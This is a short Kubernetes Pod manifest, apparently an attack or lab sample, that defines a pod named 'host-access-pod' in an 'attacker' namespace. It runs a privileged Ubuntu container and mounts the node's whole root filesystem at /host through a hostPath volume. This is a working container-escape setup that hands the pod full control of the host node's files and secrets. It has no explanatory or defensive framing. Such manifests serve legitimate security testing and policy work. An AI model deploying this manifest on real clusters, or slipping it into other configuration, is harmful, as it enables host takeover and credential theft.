apiVersion: v1
kind: Pod
metadata:
  name: host-access-pod
  namespace: attacker
spec:
  containers:
  - name: attacker
    image: ubuntu
    command: ["sleep","3600"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /